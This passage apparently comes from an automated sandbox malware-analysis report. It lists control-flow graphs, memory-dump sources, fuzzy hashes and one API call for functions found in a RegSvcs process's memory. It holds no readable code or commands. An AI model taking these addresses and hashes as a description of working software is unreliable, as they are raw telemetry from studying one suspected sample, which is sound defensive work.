1474->1479 1475->1474 1477->1464 1478->1479 1479->1434 1480 6bb5d3a-6bb5d43 1479->1480 1503 6bb5be3-6bb5c15 1501->1503 1504 6bb5c90-6bb5c97 1501->1504 1514 6bb5c1a-6bb5c5b 1503->1514 1515 6bb5c17 1503->1515 1504->1502 1505 6bb5c99-6bb5ccc 1504->1505 1517 6bb5cce 1505->1517 1518 6bb5cd1-6bb5cfe 1505->1518 1526 6bb5c5d-6bb5c6e 1514->1526 1527 6bb5c73-6bb5c7a 1514->1527 1515->1514 1517->1518 1518->1480 1526->1480 1528 6bb5c82-6bb5c84 1527->1528 1528->1480
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f78a0cc0db6bc01538f984c551f91425bcafcef2b5a38eace537838e38b86ec5
                          • Instruction ID: e0b4c596bceb459abc1205c6331709da602a3ea7e23e98cb63dcc11c02a1efa7
                          • Opcode Fuzzy Hash: f78a0cc0db6bc01538f984c551f91425bcafcef2b5a38eace537838e38b86ec5
                          • Instruction Fuzzy Hash: 7212D5B2F002049FDB74DF65D8807BEBBA2EB85310F14A4AAD4569B345DBB4EC41CB91
                          Function 06BBB292 Relevance: .6, Instructions: 583COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bee8e713a5eef9985dc492c7f54e2042fa1df6ae043419ddc1f815ce74f3c49c
                          • Instruction ID: 7d814ee7d303399128cd25ee2839b6d973eecfeb3ee6ede22385d8d75b41a5ea
                          • Opcode Fuzzy Hash: bee8e713a5eef9985dc492c7f54e2042fa1df6ae043419ddc1f815ce74f3c49c
                          • Instruction Fuzzy Hash: C6225DB0E002098FEF64CB69D890BFDB7B6EB49310F24A46AE445EB391DA75DC41CB51
                          Function 06BB3110 Relevance: .5, Instructions: 545COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2315 6bb3110-6bb3131 2316 6bb3133-6bb3136 2315->2316 2317 6bb313c-6bb315b 2316->2317 2318 6bb38d7-6bb38da 2316->2318 2328 6bb315d-6bb3160 2317->2328 2329 6bb3174-6bb317e 2317->2329 2319 6bb38dc-6bb38fb 2318->2319 2320 6bb3900-6bb3902 2318->2320 2319->2320 2322 6bb3909-6bb390c 2320->2322 2323 6bb3904 2320->2323 2322->2316 2325 6bb3912-6bb391b 2322->2325 2323->2322 2328->2329 2330 6bb3162-6bb3172 2328->2330 2332 6bb3184-6bb3193 2329->2332 2330->2332 2441 6bb3195 call 6bb3928 2332->2441 2442 6bb3195 call 6bb3930 2332->2442 2334 6bb319a-6bb319f 2335 6bb31ac-6bb3489 2334->2335 2336 6bb31a1-6bb31a7 2334->2336 2357 6bb38c9-6bb38d6 2335->2357 2358 6bb348f-6bb353e 2335->2358 2336->2325 2367 6bb3540-6bb3565 2358->2367 2368 6bb3567 2358->2368 2370 6bb3570-6bb3583 2367->2370 2368->2370 2372 6bb3589-6bb35ab 2370->2372 2373 6bb38b0-6bb38bc 2370->2373 2372->2373 2376 6bb35b1-6bb35bb 2372->2376 2373->2358 2374 6bb38c2 2373->2374 2374->2357 2376->2373 2377 6bb35c1-6bb35cc 2376->2377 2377->2373 2378 6bb35d2-6bb36a8 2377->2378 2390 6bb36aa-6bb36ac 2378->2390 2391 6bb36b6-6bb36e6 2378->2391 2390->2391 2395 6bb36e8-6bb36ea 2391->2395 2396 6bb36f4-6bb3700 2391->2396 2395->2396 2397 6bb3702-6bb3706 2396->2397 2398 6bb3760-6bb3764 2396->2398 2397->2398 2401 6bb3708-6bb3732 2397->2401 2399 6bb376a-6bb37a6 2398->2399 2400 6bb38a1-6bb38aa 2398->2400 2411 6bb37a8-6bb37aa 2399->2411 2412 6bb37b4-6bb37c2 2399->2412 2400->2373 2400->2378 2408 6bb3740-6bb375d 2401->2408 2409 6bb3734-6bb3736 2401->2409 2408->2398 2409->2408 2411->2412 2415 6bb37d9-6bb37e4 2412->2415 2416 6bb37c4-6bb37cf 2412->2416 2420 6bb37fc-6bb380d 2415->2420 2421 6bb37e6-6bb37ec 2415->2421 2416->2415 2419 6bb37d1 2416->2419 2419->2415 2425 6bb380f-6bb3815 2420->2425 2426 6bb3825-6bb3831 2420->2426 2422 6bb37ee 2421->2422 2423 6bb37f0-6bb37f2 2421->2423 2422->2420 2423->2420 2427 6bb3819-6bb381b 2425->2427 2428 6bb3817 2425->2428 2430 6bb3849-6bb389a 2426->2430 2431 6bb3833-6bb3839 2426->2431 2427->2426 2428->2426 2430->2400 2432 6bb383b 2431->2432 2433 6bb383d-6bb383f 2431->2433 2432->2430 2433->2430 2441->2334 2442->2334
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 24ed31ce81ebbcd724c71daeee1e74ec63eb2ba3b34430b8aa603d62d59eec9b
                          • Instruction ID: e417a6c56cb139d0c9f049cfde3c59b33880957f205996d97ba333f79a1824ae
                          • Opcode Fuzzy Hash: 24ed31ce81ebbcd724c71daeee1e74ec63eb2ba3b34430b8aa603d62d59eec9b
                          • Instruction Fuzzy Hash: 58324070E10719CBDB14EB69C8949EDB7B6FFC9300F10D69AD409AB250EB70AD85CB90
                          Function 06BB7DE0 Relevance: .5, Instructions: 477COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2443 6bb7de0-6bb7dfe 2444 6bb7e00-6bb7e03 2443->2444 2445 6bb7e05-6bb7e1f 2444->2445 2446 6bb7e24-6bb7e27 2444->2446 2445->2446 2447 6bb7e29-6bb7e37 2446->2447 2448 6bb7e3e-6bb7e41 2446->2448 2458 6bb7e39 2447->2458 2459 6bb7e86-6bb7e9c 2447->2459 2450 6bb7e43-6bb7e5f 2448->2450 2451 6bb7e64-6bb7e67 2448->2451 2450->2451 2453 6bb7e69-6bb7e73 2451->2453 2454 6bb7e74-6bb7e76 2451->2454 2455 6bb7e78 2454->2455 2456 6bb7e7d-6bb7e80 2454->2456 2455->2456 2456->2444 2456->2459 2458->2448 2463 6bb7ea2-6bb7eab 2459->2463 2464 6bb80b7-6bb80c1 2459->2464 2465 6bb80c2-6bb80d4 2463->2465 2466 6bb7eb1-6bb7ece 2463->2466 2469 6bb80e0-6bb80f7 2465->2469 2470 6bb80d6-6bb80de 2465->2470 2475 6bb80a4-6bb80b1 2466->2475 2476 6bb7ed4-6bb7efc 2466->2476 2471 6bb80f9-6bb80fc 2469->2471 2470->2469 2473 6bb811f-6bb8122 2471->2473 2474 6bb80fe-6bb811a 2471->2474 2477 6bb8128-6bb8134 2473->2477 2478 6bb81cf-6bb81d2 2473->2478 2474->2473 2475->2463 2475->2464 2476->2475 2494 6bb7f02-6bb7f0b 2476->2494 2485 6bb813f-6bb8141 2477->2485 2480 6bb81d8-6bb81e7 2478->2480 2481 6bb8407-6bb8409 2478->2481 2492 6bb81e9-6bb8204 2480->2492 2493 6bb8206-6bb824a 2480->2493 2483 6bb840b 2481->2483 2484 6bb8410-6bb8413 2481->2484 2483->2484 2484->2471 2489 6bb8419-6bb8422 2484->2489 2490 6bb8159-6bb815d 2485->2490 2491 6bb8143-6bb8149 2485->2491 2497 6bb816b 2490->2497 2498 6bb815f-6bb8169 2490->2498 2495 6bb814b 2491->2495 2496 6bb814d-6bb814f 2491->2496 2492->2493 2506 6bb83db-6bb83f1 2493->2506 2507 6bb8250-6bb8261 2493->2507 2494->2465 2500 6bb7f11-6bb7f2d 2494->2500 2495->2490 2496->2490 2499 6bb8170-6bb8172 2497->2499 2498->2499 2501 6bb8189-6bb81c2 2499->2501 2502 6bb8174-6bb8177 2499->2502 2510 6bb7f33-6bb7f5d 2500->2510 2511 6bb8092-6bb809e 2500->2511 2501->2480 2527 6bb81c4-6bb81ce 2501->2527 2502->2489 2506->2481 2517 6bb8267-6bb8284 2507->2517 2518 6bb83c6-6bb83d5 2507->2518 2528 6bb8088-6bb808d 2510->2528 2529 6bb7f63-6bb7f8b 2510->2529 2511->2475 2511->2494 2517->2518 2526 6bb828a-6bb8380 call 6bb6608 2517->2526 2518->2506 2518->2507 2578 6bb838e 2526->2578 2579 6bb8382-6bb838c 2526->2579 2528->2511 2529->2528 2535 6bb7f91-6bb7fbf 2529->2535 2535->2528 2540 6bb7fc5-6bb7fce 2535->2540 2540->2528 2542 6bb7fd4-6bb8006 2540->2542 2550 6bb8008-6bb800c 2542->2550 2551 6bb8011-6bb802d 2542->2551 2550->2528 2553 6bb800e 2550->2553 2551->2511 2552 6bb802f-6bb8086 call 6bb6608 2551->2552 2552->2511 2553->2551 2580 6bb8393-6bb8395 2578->2580 2579->2580 2580->2518 2581 6bb8397-6bb839c 2580->2581 2582 6bb83aa 2581->2582 2583 6bb839e-6bb83a8 2581->2583 2584 6bb83af-6bb83b1 2582->2584 2583->2584 2584->2518 2585 6bb83b3-6bb83bf 2584->2585 2585->2518
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bb55eb132e1ed44acfac30bf8af0db4dce56ef7b4ee75a889d542a3d1eaa180e
                          • Instruction ID: ece38e57c1d7f5556202531ac0c68c98e4d57d9ec6b26c214dce022399033bc9
                          • Opcode Fuzzy Hash: bb55eb132e1ed44acfac30bf8af0db4dce56ef7b4ee75a889d542a3d1eaa180e
                          • Instruction Fuzzy Hash: FE02AF70B012058FDB64DB69D490ABEBBFAFF88300F149569D406AB350DB75EC46CB90
                          Function 0149EB50 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                          Download Yara Rule

                          Control-flow Graph

                          Memory Dump Source
                          • Source File: 00000008.00000002.1471742253.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1490000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 22de118733fd8bc9ddbaeeba0a9cf3882f411378998d4ee809bc80046a6c49cf
                          • Instruction ID: f2166603dbba84b0aee680b8fc6e0f4751d67f4e208f087f451a54068b3a1b8f
                          • Opcode Fuzzy Hash: 22de118733fd8bc9ddbaeeba0a9cf3882f411378998d4ee809bc80046a6c49cf
                          • Instruction Fuzzy Hash: 6A412171D043899FDB10DFB9D8007EABFB5AF89210F1985ABD809A7251DB349880CBE1
                          Function 0149EC38 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 24 149ec38-149ec76 25 149ec7e-149ecac GlobalMemoryStatusEx 24->25 26 149ecae-149ecb4 25->26 27 149ecb5-149ecdd 25->27 26->27
                          APIs
                          • GlobalMemoryStatusEx.KERNELBASE ref: 0149EC9F
                          Memory Dump Source
                          • Source File: 00000008.00000002.1471742253.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1490000_RegSvcs.jbxd
                          Similarity
                          • API ID: GlobalMemoryStatus
                          • String ID:
                          • API String ID: 1890195054-0
                          • Opcode ID: 8108ff44aa0157a516f1e7cce85fc4832d8a7459d9ee23edae940ab160d36801
                          • Instruction ID: 8f90652cb4d46bda130cddb06f469d96c49e391b1247fad25054ddce3bbba6d3
                          • Opcode Fuzzy Hash: 8108ff44aa0157a516f1e7cce85fc4832d8a7459d9ee23edae940ab160d36801
                          • Instruction Fuzzy Hash: D211F0B2C1065A9FDB10CFAAC544BDEFBF4AF48320F15816AD818B7650D378A944CFA5
                          Function 06BB2419 Relevance: 1.0, Instructions: 995COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4fd03519dfbebcd00c40314a9d71915a720ed6f630f1fc29ae2eb81c3e69db10
                          • Instruction ID: e0d52077b8ce21fea136647e0d895519bfd7639e85c52879cefdee85f2c1c38e
                          • Opcode Fuzzy Hash: 4fd03519dfbebcd00c40314a9d71915a720ed6f630f1fc29ae2eb81c3e69db10
                          • Instruction Fuzzy Hash: B6924874E002048FDB64CF68C584BADBBF2EF49315F54A4A9D4499B361DBB5ED81CB80
                          Function 06BBCFB0 Relevance: .8, Instructions: 801COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 780 6bbcfb0-6bbcfcb 781 6bbcfcd-6bbcfd0 780->781 782 6bbcfdf-6bbcfe2 781->782 783 6bbcfd2-6bbcfd4 781->783 786 6bbcfec-6bbcfef 782->786 787 6bbcfe4-6bbcfe9 782->787 784 6bbcfda 783->784 785 6bbd357-6bbd360 783->785 784->782 788 6bbd36f-6bbd37b 785->788 789 6bbd362-6bbd367 785->789 790 6bbd038-6bbd03b 786->790 791 6bbcff1-6bbd000 786->791 787->786 792 6bbd48c-6bbd491 788->792 793 6bbd381-6bbd395 788->793 789->788 794 6bbd05e-6bbd061 790->794 795 6bbd03d-6bbd059 790->795 796 6bbd00f-6bbd01b 791->796 797 6bbd002-6bbd007 791->797 812 6bbd499 792->812 811 6bbd39b-6bbd3ad 793->811 793->812 800 6bbd0aa-6bbd0ad 794->800 801 6bbd063-6bbd0a5 794->801 795->794 798 6bbd9cd-6bbda06 796->798 799 6bbd021-6bbd033 796->799 797->796 816 6bbda08-6bbda0b 798->816 799->790 805 6bbd49c-6bbd4a8 800->805 806 6bbd0b3-6bbd0b6 800->806 801->800 809 6bbd2fe-6bbd30d 805->809 810 6bbd4ae-6bbd79b 805->810 813 6bbd0b8-6bbd0fa 806->813 814 6bbd0ff-6bbd102 806->814 819 6bbd30f-6bbd314 809->819 820 6bbd31c-6bbd328 809->820 993 6bbd9c2-6bbd9cc 810->993 994 6bbd7a1-6bbd7a7 810->994 836 6bbd3af-6bbd3b5 811->836 837 6bbd3d1-6bbd3d3 811->837 812->805 813->814 817 6bbd11f-6bbd122 814->817 818 6bbd104-6bbd11a 814->818 822 6bbda3e-6bbda41 816->822 823 6bbda0d-6bbda39 816->823 827 6bbd16b-6bbd16e 817->827 828 6bbd124-6bbd166 817->828 818->817 819->820 820->798 826 6bbd32e-6bbd340 820->826 834 6bbda43-6bbda5f 822->834 835 6bbda64-6bbda67 822->835 823->822 858 6bbd345-6bbd347 826->858 832 6bbd17d-6bbd180 827->832 833 6bbd170-6bbd172 827->833 828->827 841 6bbd1c9-6bbd1cc 832->841 842 6bbd182-6bbd1c4 832->842 833->812 839 6bbd178 833->839 834->835 848 6bbda69 call 6bbdb25 835->848 849 6bbda76-6bbda78 835->849 843 6bbd3b9-6bbd3c5 836->843 844 6bbd3b7 836->844 856 6bbd3dd-6bbd3e9 837->856 839->832 852 6bbd1ce-6bbd210 841->852 853 6bbd215-6bbd218 841->853 842->841 855 6bbd3c7-6bbd3cf 843->855 844->855 870 6bbda6f-6bbda71 848->870 850 6bbda7a 849->850 851 6bbda7f-6bbda82 849->851 850->851 851->816 859 6bbda84-6bbda93 851->859 852->853 862 6bbd21a-6bbd25c 853->862 863 6bbd261-6bbd264 853->863 855->856 884 6bbd3eb-6bbd3f5 856->884 885 6bbd3f7 856->885 867 6bbd349 858->867 868 6bbd34e-6bbd351 858->868 888 6bbdafa-6bbdb0f 859->888 889 6bbda95-6bbdaf8 call 6bb6608 859->889 862->863 875 6bbd2ad-6bbd2b0 863->875 876 6bbd266-6bbd2a8 863->876 867->868 868->781 868->785 870->849 879 6bbd2f9-6bbd2fc 875->879 880 6bbd2b2-6bbd2f4 875->880 876->875 879->809 879->858 880->879 891 6bbd3fc-6bbd3fe 884->891 885->891 910 6bbdb10 888->910 889->888 891->812 898 6bbd404-6bbd420 call 6bb6608 891->898 924 6bbd42f-6bbd43b 898->924 925 6bbd422-6bbd427 898->925 910->910 924->792 926 6bbd43d-6bbd48a 924->926 925->924 926->812 995 6bbd7a9-6bbd7ae 994->995 996 6bbd7b6-6bbd7bf 994->996 995->996 996->798 997 6bbd7c5-6bbd7d8 996->997 999 6bbd7de-6bbd7e4 997->999 1000 6bbd9b2-6bbd9bc 997->1000 1001 6bbd7f3-6bbd7fc 999->1001 1002 6bbd7e6-6bbd7eb 999->1002 1000->993 1000->994 1001->798 1003 6bbd802-6bbd823 1001->1003 1002->1001 1006 6bbd832-6bbd83b 1003->1006 1007 6bbd825-6bbd82a 1003->1007 1006->798 1008 6bbd841-6bbd85e 1006->1008 1007->1006 1008->1000 1011 6bbd864-6bbd86a 1008->1011 1011->798 1012 6bbd870-6bbd889 1011->1012 1014 6bbd88f-6bbd8b6 1012->1014 1015 6bbd9a5-6bbd9ac 1012->1015 1014->798 1018 6bbd8bc-6bbd8c6 1014->1018 1015->1000 1015->1011 1018->798 1019 6bbd8cc-6bbd8e3 1018->1019 1021 6bbd8f2-6bbd90d 1019->1021 1022 6bbd8e5-6bbd8f0 1019->1022 1021->1015 1027 6bbd913-6bbd92c call 6bb6608 1021->1027 1022->1021 1031 6bbd93b-6bbd944 1027->1031 1032 6bbd92e-6bbd933 1027->1032 1031->798 1033 6bbd94a-6bbd99e 1031->1033 1032->1031 1033->1015
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a39baaf97ffea02fbb0e3da639997ba8e380f8b5234db9e5a99cd56ab1526cca
                          • Instruction ID: 7f2ce6afce39002e13781b0159c47985ac8efc8bb2f2b48ce31bfb117c98acb4
                          • Opcode Fuzzy Hash: a39baaf97ffea02fbb0e3da639997ba8e380f8b5234db9e5a99cd56ab1526cca
                          • Instruction Fuzzy Hash: 74627FB0A002098FDB15DF68D590AADB7F6FF88700F249A69D0069F365DB75EC46CB81
                          Function 06BBB6B0 Relevance: .5, Instructions: 473COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2587 6bbb6b0-6bbb6d2 2588 6bbb6d4-6bbb6d7 2587->2588 2589 6bbb6d9-6bbb6e2 2588->2589 2590 6bbb6e7-6bbb6ea 2588->2590 2589->2590 2591 6bbb6ec-6bbb6ef 2590->2591 2592 6bbb6f4-6bbb6f7 2590->2592 2591->2592 2593 6bbb6f9-6bbb702 2592->2593 2594 6bbb70d-6bbb710 2592->2594 2595 6bbb708 2593->2595 2596 6bbb936-6bbb93f 2593->2596 2597 6bbb733-6bbb736 2594->2597 2598 6bbb712-6bbb716 2594->2598 2595->2594 2600 6bbba56-6bbba8e 2596->2600 2603 6bbb945-6bbb94c 2596->2603 2601 6bbb738-6bbb74d 2597->2601 2602 6bbb775-6bbb778 2597->2602 2599 6bbb71c-6bbb72c 2598->2599 2598->2600 2599->2591 2620 6bbb72e 2599->2620 2621 6bbba90-6bbba93 2600->2621 2601->2600 2622 6bbb753-6bbb770 2601->2622 2604 6bbb77a-6bbb77e 2602->2604 2605 6bbb78f-6bbb792 2602->2605 2606 6bbb951-6bbb954 2603->2606 2604->2600 2607 6bbb784-6bbb78a 2604->2607 2608 6bbb7ac-6bbb7af 2605->2608 2609 6bbb794-6bbb79d 2605->2609 2613 6bbb966-6bbb969 2606->2613 2614 6bbb956 2606->2614 2607->2605 2618 6bbb7e9-6bbb7ec 2608->2618 2619 6bbb7b1-6bbb7c6 2608->2619 2609->2600 2617 6bbb7a3-6bbb7a7 2609->2617 2615 6bbb96b-6bbb9c5 call 6bb6608 2613->2615 2616 6bbb9ca-6bbb9cd 2613->2616 2623 6bbb95e-6bbb961 2614->2623 2615->2616 2624 6bbb9cf-6bbb9d4 2616->2624 2625 6bbb9d7-6bbb9da 2616->2625 2617->2608 2628 6bbb7ee-6bbb7f5 2618->2628 2629 6bbb7fc-6bbb7ff 2618->2629 2619->2600 2645 6bbb7cc-6bbb7e4 2619->2645 2620->2597 2626 6bbba99-6bbbac1 2621->2626 2627 6bbbcff-6bbbd02 2621->2627 2622->2602 2623->2613 2624->2625 2634 6bbb9dc-6bbb9e2 2625->2634 2635 6bbb9e7-6bbb9ea 2625->2635 2679 6bbbacb-6bbbb0f 2626->2679 2680 6bbbac3-6bbbac6 2626->2680 2637 6bbbd25-6bbbd27 2627->2637 2638 6bbbd04-6bbbd20 2627->2638 2630 6bbb801-6bbb807 2628->2630 2631 6bbb7f7 2628->2631 2629->2630 2633 6bbb80c-6bbb80f 2629->2633 2630->2633 2631->2629 2640 6bbb81c-6bbb81f 2633->2640 2641 6bbb811-6bbb817 2633->2641 2634->2635 2643 6bbb9ec-6bbb9f1 2635->2643 2644 6bbb9f4-6bbb9f7 2635->2644 2647 6bbbd29 2637->2647 2648 6bbbd2e-6bbbd31 2637->2648 2638->2637 2650 6bbb842-6bbb845 2640->2650 2651 6bbb821-6bbb825 2640->2651 2641->2640 2643->2644 2653 6bbb9fd-6bbba00 2644->2653 2654 6bbb8d3-6bbb8dc 2644->2654 2645->2618 2647->2648 2648->2621 2649 6bbbd37-6bbbd40 2648->2649 2650->2591 2659 6bbb84b-6bbb84e 2650->2659 2651->2600 2656 6bbb82b-6bbb83b 2651->2656 2657 6bbba23-6bbba26 2653->2657 2658 6bbba02-6bbba1e 2653->2658 2654->2609 2661 6bbb8e2 2654->2661 2687 6bbb8a9-6bbb8ad 2656->2687 2688 6bbb83d 2656->2688 2657->2591 2663 6bbba2c-6bbba2f 2657->2663 2658->2657 2665 6bbb850-6bbb854 2659->2665 2666 6bbb865-6bbb868 2659->2666 2668 6bbb8e7-6bbb8ea 2661->2668 2674 6bbba39-6bbba3b 2663->2674 2675 6bbba31-6bbba34 2663->2675 2665->2600 2678 6bbb85a-6bbb860 2665->2678 2669 6bbb86a-6bbb873 2666->2669 2670 6bbb878-6bbb87b 2666->2670 2671 6bbb8fc-6bbb8ff 2668->2671 2672 6bbb8ec-6bbb8f7 2668->2672 2669->2670 2681 6bbb87d-6bbb881 2670->2681 2682 6bbb892-6bbb895 2670->2682 2685 6bbb921-6bbb924 2671->2685 2686 6bbb901-6bbb91c 2671->2686 2672->2671 2683 6bbba3d 2674->2683 2684 6bbba42-6bbba45 2674->2684 2675->2674 2678->2666 2710 6bbbb15-6bbbb1e 2679->2710 2711 6bbbcf4-6bbbcfe 2679->2711 2680->2649 2681->2600 2690 6bbb887-6bbb88d 2681->2690 2682->2593 2691 6bbb89b-6bbb89e 2682->2691 2683->2684 2684->2588 2692 6bbba4b-6bbba55 2684->2692 2695 6bbb931-6bbb934 2685->2695 2696 6bbb926-6bbb92c 2685->2696 2686->2685 2687->2600 2693 6bbb8b3-6bbb8c3 2687->2693 2688->2650 2690->2682 2691->2591 2699 6bbb8a4-6bbb8a7 2691->2699 2693->2598 2706 6bbb8c9 2693->2706 2695->2596 2695->2606 2696->2695 2699->2687 2702 6bbb8ce-6bbb8d1 2699->2702 2702->2654 2702->2668 2706->2702 2712 6bbbcea-6bbbcef 2710->2712 2713 6bbbb24-6bbbb90 call 6bb6608 2710->2713 2712->2711 2721 6bbbc8a-6bbbc9f 2713->2721 2722 6bbbb96-6bbbb9b 2713->2722 2721->2712 2724 6bbbb9d-6bbbba3 2722->2724 2725 6bbbbb7 2722->2725 2726 6bbbba9-6bbbbab 2724->2726 2727 6bbbba5-6bbbba7 2724->2727 2728 6bbbbb9-6bbbbbf 2725->2728 2729 6bbbbb5 2726->2729 2727->2729 2730 6bbbbc1-6bbbbc7 2728->2730 2731 6bbbbd4-6bbbbe1 2728->2731 2729->2728 2732 6bbbbcd 2730->2732 2733 6bbbc75-6bbbc84 2730->2733 2738 6bbbbf9-6bbbc06 2731->2738 2739 6bbbbe3-6bbbbe9 2731->2739 2732->2731 2735 6bbbc08-6bbbc15 2732->2735 2736 6bbbc3c-6bbbc49 2732->2736 2733->2721 2733->2722 2747 6bbbc2d-6bbbc3a 2735->2747 2748 6bbbc17-6bbbc1d 2735->2748 2744 6bbbc4b-6bbbc51 2736->2744 2745 6bbbc61-6bbbc6e 2736->2745 2738->2733 2740 6bbbbeb 2739->2740 2741 6bbbbed-6bbbbef 2739->2741 2740->2738 2741->2738 2749 6bbbc53 2744->2749 2750 6bbbc55-6bbbc57 2744->2750 2745->2733 2747->2733 2751 6bbbc1f 2748->2751 2752 6bbbc21-6bbbc23 2748->2752 2749->2745 2750->2745 2751->2747 2752->2747
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: abc29401acd5b64dc8fd3714b61cfbfd4a3e316720ad97e68ecb6c182dec4c04
                          • Instruction ID: 02ea21391700ab20a3b77448a1b5f112c570e82f7ab6740bbac64a657a312278
                          • Opcode Fuzzy Hash: abc29401acd5b64dc8fd3714b61cfbfd4a3e316720ad97e68ecb6c182dec4c04
                          • Instruction Fuzzy Hash: 91028FB0E002098FDB64CB69D580AFDB7B2FB89310F10A9AAD456DB251DFB4DC41CB91
                          Function 06BBAD38 Relevance: .4, Instructions: 397COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2755 6bbad38-6bbad56 2756 6bbad58-6bbad5b 2755->2756 2757 6bbad61-6bbad64 2756->2757 2758 6bbaf55-6bbaf5e 2756->2758 2761 6bbad6e-6bbad71 2757->2761 2762 6bbad66-6bbad6b 2757->2762 2759 6bbada3-6bbadac 2758->2759 2760 6bbaf64-6bbaf6e 2758->2760 2766 6bbaf6f-6bbaf79 2759->2766 2767 6bbadb2-6bbadb6 2759->2767 2763 6bbad8b-6bbad8e 2761->2763 2764 6bbad73-6bbad86 2761->2764 2762->2761 2768 6bbad9e-6bbada1 2763->2768 2769 6bbad90-6bbad99 2763->2769 2764->2763 2777 6bbaf7b-6bbaf7d 2766->2777 2778 6bbaf2e 2766->2778 2770 6bbadbb-6bbadbe 2767->2770 2768->2759 2768->2770 2769->2768 2772 6bbadd2-6bbadd5 2770->2772 2773 6bbadc0-6bbadcd 2770->2773 2775 6bbadf8-6bbadfb 2772->2775 2776 6bbadd7-6bbadf3 2772->2776 2773->2772 2780 6bbadfd-6bbae01 2775->2780 2781 6bbae0c-6bbae0e 2775->2781 2776->2775 2782 6bbaf7f-6bbafa6 2777->2782 2783 6bbaf32-6bbaf4b 2777->2783 2778->2783 2780->2760 2785 6bbae07 2780->2785 2786 6bbae10 2781->2786 2787 6bbae15-6bbae18 2781->2787 2791 6bbafa8-6bbafab 2782->2791 2801 6bbaf52 2783->2801 2785->2781 2786->2787 2787->2756 2789 6bbae1e-6bbae42 2787->2789 2789->2801 2804 6bbae48-6bbae57 2789->2804 2793 6bbafb8-6bbafbb 2791->2793 2794 6bbafad-6bbafb1 2791->2794 2799 6bbafca-6bbafcd 2793->2799 2800 6bbafbd call 6bbb292 2793->2800 2797 6bbafd3-6bbb00e 2794->2797 2798 6bbafb3 2794->2798 2811 6bbb201-6bbb214 2797->2811 2812 6bbb014-6bbb020 2797->2812 2798->2793 2799->2797 2803 6bbb236-6bbb239 2799->2803 2805 6bbafc3-6bbafc5 2800->2805 2801->2758 2807 6bbb23b-6bbb257 2803->2807 2808 6bbb25c-6bbb25f 2803->2808 2820 6bbae59-6bbae5f 2804->2820 2821 6bbae6f-6bbaeaa call 6bb6608 2804->2821 2805->2799 2807->2808 2809 6bbb26c-6bbb26e 2808->2809 2810 6bbb261-6bbb26b 2808->2810 2815 6bbb270 2809->2815 2816 6bbb275-6bbb278 2809->2816 2814 6bbb216 2811->2814 2824 6bbb022-6bbb03b 2812->2824 2825 6bbb040-6bbb084 2812->2825 2823 6bbb217 2814->2823 2815->2816 2816->2791 2819 6bbb27e-6bbb288 2816->2819 2826 6bbae63-6bbae65 2820->2826 2827 6bbae61 2820->2827 2838 6bbaeac-6bbaeb2 2821->2838 2839 6bbaec2-6bbaed9 2821->2839 2823->2823 2824->2814 2843 6bbb0a0-6bbb0df 2825->2843 2844 6bbb086-6bbb098 2825->2844 2826->2821 2827->2821 2841 6bbaeb6-6bbaeb8 2838->2841 2842 6bbaeb4 2838->2842 2851 6bbaedb-6bbaee1 2839->2851 2852 6bbaef1-6bbaf02 